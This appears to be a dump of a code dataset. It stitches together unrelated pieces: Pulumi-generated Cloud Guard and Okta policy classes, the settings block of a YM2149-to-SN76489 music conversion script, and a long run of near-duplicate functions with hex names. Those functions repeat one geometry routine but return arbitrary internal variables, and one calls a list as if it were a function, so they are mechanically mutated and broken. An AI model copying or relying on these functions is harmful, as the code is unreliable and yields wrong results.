input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
def description(self) -> str:
"""
ResponderRule Description
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def detector(self) -> str:
"""
detector for the rule
"""
return pulumi.get(self, "detector")
@property
@pulumi.getter(name="detectorRecipeId")
def detector_recipe_id(self) -> str:
"""
Unique identifier for Detector Recipe of which this is an extension
"""
return pulumi.get(self, "detector_recipe_id")
@property
@pulumi.getter(name="detectorRules")
def detector_rules(self) -> Sequence['outputs.GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleResult']:
"""
List of detector rules for the detector type for recipe - user input
"""
return pulumi.get(self, "detector_rules")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> str:
"""
A filter to return only resources that match the entire display name given.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter(name="effectiveDetectorRules")
def effective_detector_rules(self) -> Sequence['outputs.GetTargetsTargetCollectionItemTargetDetectorRecipeEffectiveDetectorRuleResult']:
"""
List of effective detector rules for the detector type for recipe after applying defaults
"""
return pulumi.get(self, "effective_detector_rules")
@property
@pulumi.getter
def id(self) -> str:
"""
Unique identifier of TargetResponderRecipe that is immutable on creation
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def owner(self) -> str:
"""
Owner of ResponderRecipe
"""
return pulumi.get(self, "owner")
@property
@pulumi.getter
def state(self) -> str:
"""
The field life cycle state. Only one state can be provided. Default value for state is active. If no value is specified state is active.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> str:
"""
The date and time the target was created. Format defined by RFC3339.
"""
return pulumi.get(self, "time_created")
@property
@pulumi.getter(name="timeUpdated")
def time_updated(self) -> str:
"""
The date and time the target was updated. Format defined by RFC3339.
"""
return pulumi.get(self, "time_updated")
@pulumi.output_type
class GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleResult(dict):
def __init__(__self__, *,
description: str,
details: 'outputs.GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsResult',
detector: str,
detector_rule_id: str,
display_name: str,
lifecycle_details: str,
managed_list_types: Sequence[str],
recommendation: str,
resource_type: str,
service_type: str,
state: str,
time_created: str,
time_updated: str):
"""
:param str description: ResponderRule Description
:param 'GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsArgs' details: Details of ResponderRule.
:param str detector: detector for the rule
:param str detector_rule_id: The unique identifier of the detector rule
:param str display_name: A filter to return only resources that match the entire display name given.
:param str lifecycle_details: A message describing the current state in more detail. For example, can be used to provide actionable information for a resource in Failed state.
:param Sequence[str] managed_list_types: List of cloudguard managed list types related to this rule
:param str recommendation: Recommendation for TargetDetectorRecipeDetectorRule
:param str resource_type: resource type of the configuration to which the rule is applied
:param str service_type: service type of the configuration to which the rule is applied
:param str state: The field life cycle state. Only one state can be provided. Default value for state is active. If no value is specified state is active.
:param str time_created: The date and time the target was created. Format defined by RFC3339.
:param str time_updated: The date and time the target was updated. Format defined by RFC3339.
"""
pulumi.set(__self__, "description", description)
pulumi.set(__self__, "details", details)
pulumi.set(__self__, "detector", detector)
pulumi.set(__self__, "detector_rule_id", detector_rule_id)
pulumi.set(__self__, "display_name", display_name)
pulumi.set(__self__, "lifecycle_details", lifecycle_details)
pulumi.set(__self__, "managed_list_types", managed_list_types)
pulumi.set(__self__, "recommendation", recommendation)
pulumi.set(__self__, "resource_type", resource_type)
pulumi.set(__self__, "service_type", service_type)
pulumi.set(__self__, "state", state)
pulumi.set(__self__, "time_created", time_created)
pulumi.set(__self__, "time_updated", time_updated)
@property
@pulumi.getter
def description(self) -> str:
"""
ResponderRule Description
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def details(self) -> 'outputs.GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsResult':
"""
Details of ResponderRule.
"""
return pulumi.get(self, "details")
@property
@pulumi.getter
def detector(self) -> str:
"""
detector for the rule
"""
return pulumi.get(self, "detector")
@property
@pulumi.getter(name="detectorRuleId")
def detector_rule_id(self) -> str:
"""
The unique identifier of the detector rule
"""
return pulumi.get(self, "detector_rule_id")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> str:
"""
A filter to return only resources that match the entire display name given.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter(name="lifecycleDetails")
def lifecycle_details(self) -> str:
"""
A message describing the current state in more detail. For example, can be used to provide actionable information for a resource in Failed state.
"""
return pulumi.get(self, "lifecycle_details")
@property
@pulumi.getter(name="managedListTypes")
def managed_list_types(self) -> Sequence[str]:
"""
List of cloudguard managed list types related to this rule
"""
return pulumi.get(self, "managed_list_types")
@property
@pulumi.getter
def recommendation(self) -> str:
"""
Recommendation for TargetDetectorRecipeDetectorRule
"""
return pulumi.get(self, "recommendation")
@property
@pulumi.getter(name="resourceType")
def resource_type(self) -> str:
"""
resource type of the configuration to which the rule is applied
"""
return pulumi.get(self, "resource_type")
@property
@pulumi.getter(name="serviceType")
def service_type(self) -> str:
"""
service type of the configuration to which the rule is applied
"""
return pulumi.get(self, "service_type")
@property
@pulumi.getter
def state(self) -> str:
"""
The field life cycle state. Only one state can be provided. Default value for state is active. If no value is specified state is active.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> str:
"""
The date and time the target was created. Format defined by RFC3339.
"""
return pulumi.get(self, "time_created")
@property
@pulumi.getter(name="timeUpdated")
def time_updated(self) -> str:
"""
The date and time the target was updated. Format defined by RFC3339.
"""
return pulumi.get(self, "time_updated")
@pulumi.output_type
class GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsResult(dict):
def __init__(__self__, *,
condition_groups: Sequence['outputs.GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsConditionGroupResult'],
configurations: Sequence['outputs.GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsConfigurationResult'],
is_configuration_allowed: bool,
is_enabled: bool,
labels: Sequence[str],
risk_level: str):
"""
:param Sequence['GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsConditionGroupArgs'] condition_groups: Condition group corresponding to each compartment
:param Sequence['GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsConfigurationArgs'] configurations: ResponderRule configurations
:param bool is_configuration_allowed: configuration allowed or not
:param bool is_enabled: Identifies state for ResponderRule
:param Sequence[str] labels: user defined labels for a detector rule
:param str risk_level: The Risk Level
"""
pulumi.set(__self__, "condition_groups", condition_groups)
pulumi.set(__self__, "configurations", configurations)
pulumi.set(__self__, "is_configuration_allowed", is_configuration_allowed)
pulumi.set(__self__, "is_enabled", is_enabled)
pulumi.set(__self__, "labels", labels)
pulumi.set(__self__, "risk_level", risk_level)
@property
@pulumi.getter(name="conditionGroups")
def condition_groups(self) -> Sequence['outputs.GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsConditionGroupResult']:
"""
Condition group corresponding to each compartment
"""
return pulumi.get(self, "condition_groups")
@property
@pulumi.getter
def configurations(self) -> Sequence['outputs.GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsConfigurationResult']:
"""
ResponderRule configurations
"""
return pulumi.get(self, "configurations")
@property
@pulumi.getter(name="isConfigurationAllowed")
def is_configuration_allowed(self) -> bool:
"""
configuration allowed or not
"""
return pulumi.get(self, "is_configuration_allowed")
@property
@pulumi.getter(name="isEnabled")
def is_enabled(self) -> bool:
"""
Identifies state for ResponderRule
"""
return pulumi.get(self, "is_enabled")
@property
@pulumi.getter
def labels(self) -> Sequence[str]:
"""
user defined labels for a detector rule
"""
return pulumi.get(self, "labels")
@property
@pulumi.getter(name="riskLevel")
def risk_level(self) -> str:
"""
The Risk Level
"""
return pulumi.get(self, "risk_level")
@pulumi.output_type
class GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsConditionGroupResult(dict):
def __init__(__self__, *,
compartment_id: str,
condition: str):
"""
:param str compartment_id: The ID of the compartment in which to list resources.
"""
pulumi.set(__self__, "compartment_id", compartment_id)
pulumi.set(__self__, "condition", condition)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> str:
"""
The ID of the compartment in which to list resources.
"""
return pulumi.get(self, "compartment_id")
@property
@pulumi.getter
def condition(self) -> str:
return pulumi.get(self, "condition")
@pulumi.output_type
class GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsConfigurationResult(dict):
def __init__(__self__, *,
config_key: str,
data_type: str,
name: str,
value: str,
values: Sequence['outputs.GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsConfigurationValueResult']):
"""
:param str config_key: Unique name of the configuration
:param str data_type: configuration data type
:param str name: configuration name
:param str value: configuration value
:param Sequence['GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsConfigurationValueArgs'] values: List of configuration values
"""
pulumi.set(__self__, "config_key", config_key)
pulumi.set(__self__, "data_type", data_type)
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "value", value)
pulumi.set(__self__, "values", values)
@property
@pulumi.getter(name="configKey")
def config_key(self) -> str:
"""
Unique name of the configuration
"""
return pulumi.get(self, "config_key")
@property
@pulumi.getter(name="dataType")
def data_type(self) -> str:
"""
configuration data type
"""
return pulumi.get(self, "data_type")
@property
@pulumi.getter
def name(self) -> str:
"""
configuration name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def value(self) -> str:
"""
configuration value
"""
return pulumi.get(self, "value")
@property
@pulumi.getter
def values(self) -> Sequence['outputs.GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsConfigurationValueResult']:
"""
List of configuration values
"""
return pulumi.get(self, "values")
@pulumi.output_type
class GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsConfigurationValueResult(dict):
def __init__(__self__, *,
list_type: str,
managed_list_type: str,
value: str):
"""
:param str list_type: configuration list item type, either CUSTOM or MANAGED
:param str managed_list_type: type of the managed list
:param str value: configuration value
"""
pulumi.set(__self__, "list_type", list_type)
pulumi.set(__self__, "managed_list_type", managed_list_type)
pulumi.set(__self__, "value", value)
@property
@pulumi.getter(name="listType")
def list_type(self) -> str:
"""
configuration list item type, either CUSTOM or MANAGED
"""
return pulumi.get(self, "list_type")
@property
@pulumi.getter(name="managedListType")
def managed_list_type(self) -> str:
"""
type of the managed list
"""
return pulumi.get(self, "managed_list_type")
@property
@pulumi.getter
def value(self) -> str:
"""
configuration value
"""
return pulumi.get(self, "value")
@pulumi.output_type
class GetTargetsTargetCollectionItemTargetDetectorRecipeEffectiveDetectorRuleResult(dict):
def __init__(__self__, *,
description: str,
details: 'outputs.GetTargetsTargetCollectionItemTargetDetectorRecipeEffectiveDetectorRuleDetailsResult',
detector: str,
detector_rule_id: str,
display_name: str,
lifecycle_details: str,
managed_list_types: Sequence[str],
recommendation: str,
resource_type: str,
service_type: str,
state: str,
time_created: str,
time_updated: str):
"""
:param str description: ResponderRule Description
:param 'GetTargetsTargetCollectionItemTargetDetectorRecipeEffectiveDetectorRuleDetailsArgs' details: Details of ResponderRule.
:param str detector: detector for the rule
:param str detector_rule_id: The unique identifier of the detector rule
| |
<reponame>kieranhj/ym2149f
#!/usr/bin/env python
# ym2sn.py
# .YM files (YM2149 sound chip) to SN76489 .VGM music file format conversion utility
# was originated based on code from https://github.com/FlorentFlament/ym2149-streamer
# Almost completely rewritten by https://github.com/simondotm/
#
# Copyright (c) 2019 <NAME>. All rights reserved.
#
# "MIT License":
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the Software
# is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
# PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import functools
import itertools
import struct
import sys
import time
import binascii
import math
import os
from os.path import basename
PYTHON_VERSION = sys.version_info[0] # returns 2 or >=3
# Command line can override these defaults
SN_CLOCK = 4000000 # set this to the target SN chip clock speed
LFSR_BIT = 15 # set this to either 15 or 16 depending on which bit of the LFSR is tapped in the SN chip
ENABLE_ENVELOPES = True # enable this to simulate envelopes in the output
ENABLE_ATTENUATION = False # enables conversion of YM to SN attenuation. In theory a better matching of volume in the output.
FILTER_CHANNEL_A = False
FILTER_CHANNEL_B = False
FILTER_CHANNEL_C = False
FILTER_CHANNEL_N = False # Noise channel
ENABLE_DEBUG = False # enable this to have ALL the info spitting out. This is more than ENABLE_VERBOSE
ENABLE_VERBOSE = False
ARDUINO_BIN = False
ENABLE_TUNED_NOISE = False # enable this to tune white noise rather than use the nearest fixed frequency white noise
# white noise is generated every counter cycle, so unlike square wave scale is 1.0 rather than 2.0
SN_NOISE_DC = 2.0 # 2.0
# Percussive Noise has a dedicated channel and attenuator on the SN
# whereas on the YM, the noise waveform is logically OR'd with the squarewave
# Therefore each YM channel contributes 1/3 of the overall noise volume
# As a result SN percussion adds 25% extra volume in the mix unless we compensate for it.
# This scaler allows that to be balanced
# This can be tweaked if necessary
NOISE_MIX_SCALE = 1.0 / 3.0
# Runtime options (not command line options)
ENABLE_NOISE = True # enables noises to be processed
ENABLE_NOISE_PITCH = True # enables 'nearest match' fixed white noise frequency selection rather than fixed single frequency
ENABLE_ENVELOPE_MIX_HACK = True # wierd oddity fix where tone mix is disabled, but envelopes are enabled - EXPERIMENTAL
OPTIMIZE_VGM = True # outputs delta register updates in the vgm rather than 1:1 register dumps
SAMPLE_RATE = 1 # number of volume frames to process per YM frame (1=50Hz, 2=100Hz, 63=700Hz, 126=6300Hz (GOOD!) 147=7350Hz, 294=14700Hz, 441=22050Hz, 882=44100Hz)
# legacy/non working debug flags
SIM_ENVELOPES = True # set to true to use full volume for envelepe controlled sounds
# For testing only
ENABLE_BIN = False # enable output of a test 'bin' file (ie. the raw SN data file)
#--------------------------------------------------------------------
# Bass frequency processing settings
#--------------------------------------------------------------------
# Since the hardware SN76489 chip is limited to a frequency range determined by its clock rate, and also 10-bit precision,
# so some low-end frequencies cannot be reproduced to match the 12-bit precision YM chip.
#
# To remedy this we have two techniques available:
# 1. Use the periodic noise feature of the SN76489 to 'simulate' these lower frequencies (at the cost of interleaving percussion and some approximation because we can only have one channel playing PN)
# 2. Simulate the low-end frequencies in software by implementing a low frequency square wave using software timers to manipulate attenuation on the tone channels
# Periodic noise based bass settings (default)
ENABLE_BASS_TONES = True # enables low frequency tones to be simulated with periodic noise
ENABLE_BASS_BIAS = True # enables bias to the most active bass channel when more than one low frequency tone is playing at once.
FORCE_BASS_CHANNEL = -1 #-1 # set this to 0,1 or 2 (A/B/C) or -1, to make a specific channel always take the bass frequency. Not an elegant or useful approach.
# Software bass settings (overrides periodic noise bass)
# Enabling this setting will create output register data that is not hardware compliant, so any decoder must interpret the data correctly to synthesize bass frequencies.
# The output VGM file is VGM compatible, but it will not sound correct when played due to the data modifications.
#
# The approach is as follows:
# For any frequency on a tone channel that is below the SN76489 hardware tone frequency range (ie. value > 10-bits)
# We divide the tone register value by 4, store that in the 10-bit output, but set bit 6 in the high byte DATA register.
# The decoder must check for this bit being set and interpet the tone register value as the duty cycle time for a software generated squarewave.
ENABLE_SOFTWARE_BASS = False
if ENABLE_SOFTWARE_BASS:
TONE_RANGE = 4095
ENABLE_BASS_TONES = False
else:
TONE_RANGE = 1023
# R00 = Channel A Pitch LO (8 bits)
# R01 = Channel A Pitch HI (4 bits)
# R02 = Channel B Pitch LO (8 bits)
# R03 = Channel B Pitch HI (4 bits)
# R04 = Channel C Pitch LO (8 bits)
# R05 = Channel C Pitch HI (4 bits)
# R06 = Noise Frequency (5 bits)
# R07 = I/O & Mixer (IOB|IOA|NoiseC|NoiseB|NoiseA|ToneC|ToneB|ToneA)
# R08 = Channel A Level (M | 4 bits) (where M is mode)
# R09 = Channel B Level (M | 4 bits)
# R10 = Channel C Level (M | 4 bits)
# R11 = Envelope Freq LO (8 bits)
# R12 = Envelope Freq HI (8 bits)
# R13 = Envelope Shape (CONT|ATT|ALT|HOLD)
# Chip specs:
# 3 x Squarewave tone oscillators and 1 x Noise generator
# 1 x Envelope driver
# 1 x Mixer
# Pitch oscillation frequency is (Clock / 16 x TP) [TP is tone pitch]
# Noise frequency is (Clock / 16 x NP) [NP is noise pitch R6]
# Noise and/or Tone is output when Mixer flag is set to 0 for a channel
# Mode [M] is 1, then envelope drives volume, when 0, the 4 bit value drives attenuation
# Envelope repetition frequency (fE) is (Clock / 256 x EP) [EP is envelope frequency]
# Envelope shape has 10 valid settings - see data sheet for details
# Envelope Generator
# The envelope generator is a simple 5-bit counter, that can be incremented, decremented, reset or stopped
# Control of it's behaviour is via R13
# The output of the counter drives the attenuation of the output signal (in 5 bit precision rather than 4 bit normally)
# The counter increments once every fE/32
# By calculating the envelope frequency we can determine how fast any software simulation of the waveform would need to be
# Writing to register 13 resets the envelope clock
# r13 has a particular status. If the value stored in the file is 0xff, YM emulator will not reset the waveform position.
# To get envelopes working on an SN chip we'd have to simulate the envelopes
# by reprogramming attenuation registers at the correct frequency
# Note that since the SN only has four bit of precision for volume,
# it is already half the required update frequency
# Effects & Digidrums
# Digidrums are 4-bit samples played on one of the 3 voices
# Information for playback is encoded into the spare bits of the YM register data
# Plus 2 'virtual' registers (14+15)
# See ftp://ftp.modland.com/pub/documents/format_documentation/Atari%20ST%20Sound%20Chip%20Emulator%20YM1-6%20(.ay,%20.ym).txt
# r1 free bits are used to code TS:
# r1 bits b5-b4 is a 2bits code wich means:
#
# 00: No TS.
# 01: TS | |
h1
qc = -area_from_left
x = (-qb + (qb ** 2 - 4 * qa * qc) ** 0.5) / (2 * qa)
cuts.append(x1 + x)
if len(cuts) == npieces - 1:
return cuts
segment_remaining -= needed
needed = size
needed -= segment_remaining
return needed
def func_7f0198e143c047f5854e210e55de0ab7(npieces, upper, lower):
li = ui = 0
areas = []
total_area = 0
x = 0
h1 = upper[0][1] - lower[0][1]
W = lower[-1][0]
while x < W:
lnext = lower[li + 1]
unext = upper[ui + 1]
if lnext[0] == unext[0]:
xnext = lnext[0]
h2 = unext[1] - lnext[1]
li += 1
ui += 1
elif lnext[0] < upper[ui + 1][0]:
xnext = lnext[0]
frac = 1.0 * (xnext - upper[ui][0]) / (unext[0] - upper[ui][0])
yupper = upper[ui][1] + frac * (unext[1] - upper[ui][1])
h2 = yupper - lnext[1]
li += 1
else:
xnext = unext[0]
frac = 1.0 * (xnext - lower[li][0]) / (lnext[0] - lower[li][0])
ylower = lower[li][1] + frac * (lnext[1] - lower[li][1])
h2 = unext[1] - ylower
ui += 1
da = (xnext - x) * (h1 + h2) / 2.0
total_area += da
areas.append((x, xnext, h1, h2, da, total_area))
x = xnext
h1 = h2
size = total_area / npieces
cuts = []
needed = size
for x1, x2, h1, h2, segment_area, total_area in areas:
segment_remaining = segment_area
area_from_left = 0
while segment_remaining >= needed:
area_from_left += needed
width = x2 - x1
if h1 == h2:
x = area_from_left / h1
else:
qa = (h2 - h1) / (2 * width)
qb = h1
qc = -area_from_left
x = (-qb + (qb ** 2 - 4 * qa * qc) ** 0.5) / (2 * qa)
cuts.append(x1 + x)
if len(cuts) == npieces - 1:
return cuts
segment_remaining -= needed
needed = size
needed -= segment_remaining
return W
def func_65abc3cbaf334111a1904ca6068f4323(npieces, upper, lower):
li = ui = 0
areas = []
total_area = 0
x = 0
h1 = upper[0][1] - lower[0][1]
W = lower[-1][0]
while x < W:
lnext = lower[li + 1]
unext = upper[ui + 1]
if lnext[0] == unext[0]:
xnext = lnext[0]
h2 = unext[1] - lnext[1]
li += 1
ui += 1
elif lnext[0] < upper[ui + 1][0]:
xnext = lnext[0]
frac = 1.0 * (xnext - upper[ui][0]) / (unext[0] - upper[ui][0])
yupper = upper[ui][1] + frac * (unext[1] - upper[ui][1])
h2 = yupper - lnext[1]
li += 1
else:
xnext = unext[0]
frac = 1.0 * (xnext - lower[li][0]) / (lnext[0] - lower[li][0])
ylower = lower[li][1] + frac * (lnext[1] - lower[li][1])
h2 = unext[1] - ylower
ui += 1
da = (xnext - x) * (h1 + h2) / 2.0
total_area += da
areas.append((x, xnext, h1, h2, da, total_area))
x = xnext
h1 = h2
size = total_area / npieces
cuts = []
needed = size
for x1, x2, h1, h2, segment_area, total_area in areas:
segment_remaining = segment_area
area_from_left = 0
while segment_remaining >= needed:
area_from_left += needed
width = x2 - x1
if h1 == h2:
x = area_from_left / h1
else:
qa = (h2 - h1) / (2 * width)
qb = h1
qc = -area_from_left
x = (-qb + (qb ** 2 - 4 * qa * qc) ** 0.5) / (2 * qa)
cuts.append(x1 + x)
if len(cuts) == npieces - 1:
return cuts
segment_remaining -= needed
needed = size
needed -= segment_remaining
return li
def func_72619dff26fd49b1b3f769acede8a49b(npieces, upper, lower):
li = ui = 0
areas = []
total_area = 0
x = 0
h1 = upper[0][1] - lower[0][1]
W = lower[-1][0]
while x < W:
lnext = lower[li + 1]
unext = upper[ui + 1]
if lnext[0] == unext[0]:
xnext = lnext[0]
h2 = unext[1] - lnext[1]
li += 1
ui += 1
elif lnext[0] < upper[ui + 1][0]:
xnext = lnext[0]
frac = 1.0 * (xnext - upper[ui][0]) / (unext[0] - upper[ui][0])
yupper = upper[ui][1] + frac * (unext[1] - upper[ui][1])
h2 = yupper - lnext[1]
li += 1
else:
xnext = unext[0]
frac = 1.0 * (xnext - lower[li][0]) / (lnext[0] - lower[li][0])
ylower = lower[li][1] + frac * (lnext[1] - lower[li][1])
h2 = unext[1] - ylower
ui += 1
da = (xnext - x) * (h1 + h2) / 2.0
total_area += da
areas.append((x, xnext, h1, h2, da, total_area))
x = xnext
h1 = h2
size = total_area / npieces
cuts = []
needed = size
for x1, x2, h1, h2, segment_area, total_area in areas:
segment_remaining = segment_area
area_from_left = 0
while segment_remaining >= needed:
area_from_left += needed
width = x2 - x1
if h1 == h2:
x = area_from_left / h1
else:
qa = (h2 - h1) / (2 * width)
qb = h1
qc = -area_from_left
x = (-qb + (qb ** 2 - 4 * qa * qc) ** 0.5) / (2 * qa)
cuts.append(x1 + x)
if len(cuts) == npieces - 1:
return cuts
segment_remaining -= needed
needed = size
needed -= segment_remaining
return area_from_left
def func_acc1cf2e160140b1949af7872e98cfc2(npieces, upper, lower):
li = ui = 0
areas = []
total_area = 0
x = 0
h1 = upper[0][1] - lower[0][1]
W = lower[-1][0]
while x < W:
lnext = lower[li + 1]
unext = upper[ui + 1]
if lnext[0] == unext[0]:
xnext = lnext[0]
h2 = unext[1] - lnext[1]
li += 1
ui += 1
elif lnext[0] < upper[ui + 1][0]:
xnext = lnext[0]
frac = 1.0 * (xnext - upper[ui][0]) / (unext[0] - upper[ui][0])
yupper = upper[ui][1] + frac * (unext[1] - upper[ui][1])
h2 = yupper - lnext[1]
li += 1
else:
xnext = unext[0]
frac = 1.0 * (xnext - lower[li][0]) / (lnext[0] - lower[li][0])
ylower = lower[li][1] + frac * (lnext[1] - lower[li][1])
h2 = unext[1] - ylower
ui += 1
da = (xnext - x) * (h1 + h2) / 2.0
total_area += da
areas.append((x, xnext, h1, h2, da, total_area))
x = xnext
h1 = h2
size = total_area / npieces
cuts = []
needed = size
for x1, x2, h1, h2, segment_area, total_area in areas:
segment_remaining = segment_area
area_from_left = 0
while segment_remaining >= needed:
area_from_left += needed
width = x2 - x1
if h1 == h2:
x = area_from_left / h1
else:
qa = (h2 - h1) / (2 * width)
qb = h1
qc = -area_from_left
x = (-qb + (qb ** 2 - 4 * qa * qc) ** 0.5) / (2 * qa)
cuts.append(x1 + x)
if len(cuts) == npieces - 1:
return cuts
segment_remaining -= needed
needed = size
needed -= segment_remaining
return x
def func_c2929ae2c19149a88a70128c25e6ca9f(infile):
W, L, U, G = map(int, infile.readline().split())
lower = []
return lower
def func_3edd52e9c31f4b048aac383659844c00(infile):
W, L, U, G = map(int, infile.readline().split())
lower = []
return G
def func_c207992cf0b54db69e25fb638c2aa8ff(infile):
W, L, U, G = map(int, infile.readline().split())
lower = []
return L
def func_fdeba186f3d14cc4b2b8f67e2e8b24a9(infile):
W, L, U, G = map(int, infile.readline().split())
lower = []
return U
def func_1a7f14da77a447acbd515901f41fc06a(infile):
W, L, U, G = map(int, infile.readline().split())
lower = []
return W
def func_c2f97cad34ff4d66b9798e2842ac939a():
lower = []
upper = []
return upper
def func_a88ffd3e0f5c4f21b12d3c93bbd7351d():
lower = []
upper = []
return lower
def func_c6eea036fc1b4389a7dee548c2920420(infile, lower, L):
upper = []
for j in xrange(L):
lower.append(map(float, infile.readline().split()))
return j
def func_a0ae016003904ceaa29a2abbd9d28a8c(infile, lower, L):
upper = []
for j in xrange(L):
lower.append(map(float, infile.readline().split()))
return upper
def func_7eea82bcad1e432a965314393d14ebd3(upper, infile, U, lower, L):
for j in xrange(L):
lower.append(map(float, infile.readline().split()))
for j in xrange(U):
upper.append(map(float, infile.readline().split()))
return j
def func_905603ec298b4ae29616d69552bf423d(upper, infile, U, lower, G):
for j in xrange(U):
upper.append(map(float, infile.readline().split()))
result = get_cuts(lower, upper, G)
return j
def func_56f5b2de7ad4417c88b4a769128d9947(upper, infile, U, lower, G):
for j in xrange(U):
upper.append(map(float, infile.readline().split()))
result = get_cuts(lower, upper, G)
return result
def func_fb1d70d62b8e4427805275234a248016(upper, lower, i, G):
result = get_cuts(lower, upper, G)('Case #%d:' % (i + 1,))
return result
def func_dd3a4292bd1b40d69d778d2080829a67(infile):
W, L, U, G = map(int, infile.readline().split())
lower = []
upper = []
return G
def func_2d7990088bb4499db82d212b5ad32963(infile):
W, L, U, G = map(int, infile.readline().split())
lower = []
upper = | |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['ServerPolicyRuleArgs', 'ServerPolicyRule']
@pulumi.input_type
class ServerPolicyRuleArgs:
def __init__(__self__, *,
auth_server_id: pulumi.Input[str],
grant_type_whitelists: pulumi.Input[Sequence[pulumi.Input[str]]],
policy_id: pulumi.Input[str],
priority: pulumi.Input[int],
access_token_lifetime_minutes: Optional[pulumi.Input[int]] = None,
group_blacklists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
group_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
inline_hook_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
refresh_token_lifetime_minutes: Optional[pulumi.Input[int]] = None,
refresh_token_window_minutes: Optional[pulumi.Input[int]] = None,
scope_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
status: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
user_blacklists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
user_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a ServerPolicyRule resource.
:param pulumi.Input[str] auth_server_id: Auth Server ID.
:param pulumi.Input[Sequence[pulumi.Input[str]]] grant_type_whitelists: Accepted grant type values, `"authorization_code"`, `"implicit"`, `"password"` or `"client_credentials"`. For `"implicit"` value either `user_whitelist` or `group_whitelist` should be set.
:param pulumi.Input[str] policy_id: Auth Server Policy ID.
:param pulumi.Input[int] priority: Priority of the auth server policy rule.
:param pulumi.Input[int] access_token_lifetime_minutes: Lifetime of access token. Can be set to a value between 5 and 1440 minutes.
:param pulumi.Input[Sequence[pulumi.Input[str]]] group_blacklists: Specifies a set of Groups whose Users are to be excluded.
:param pulumi.Input[Sequence[pulumi.Input[str]]] group_whitelists: Specifies a set of Groups whose Users are to be included. Can be set to Group ID or to the following: "EVERYONE".
:param pulumi.Input[str] inline_hook_id: The ID of the inline token to trigger.
:param pulumi.Input[str] name: Auth Server Policy Rule name.
:param pulumi.Input[int] refresh_token_lifetime_minutes: Lifetime of refresh token.
:param pulumi.Input[int] refresh_token_window_minutes: Window in which a refresh token can be used. It can be a value between 5 and 2628000 (5 years) minutes.
`"refresh_token_window_minutes"` must be between `"access_token_lifetime_minutes"` and `"refresh_token_lifetime_minutes"`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] scope_whitelists: Scopes allowed for this policy rule. They can be whitelisted by name or all can be whitelisted with `"*"`.
:param pulumi.Input[str] status: The status of the Auth Server Policy Rule.
:param pulumi.Input[str] type: The type of the Auth Server Policy Rule.
:param pulumi.Input[Sequence[pulumi.Input[str]]] user_blacklists: Specifies a set of Users to be excluded.
:param pulumi.Input[Sequence[pulumi.Input[str]]] user_whitelists: Specifies a set of Users to be included.
"""
pulumi.set(__self__, "auth_server_id", auth_server_id)
pulumi.set(__self__, "grant_type_whitelists", grant_type_whitelists)
pulumi.set(__self__, "policy_id", policy_id)
pulumi.set(__self__, "priority", priority)
if access_token_lifetime_minutes is not None:
pulumi.set(__self__, "access_token_lifetime_minutes", access_token_lifetime_minutes)
if group_blacklists is not None:
pulumi.set(__self__, "group_blacklists", group_blacklists)
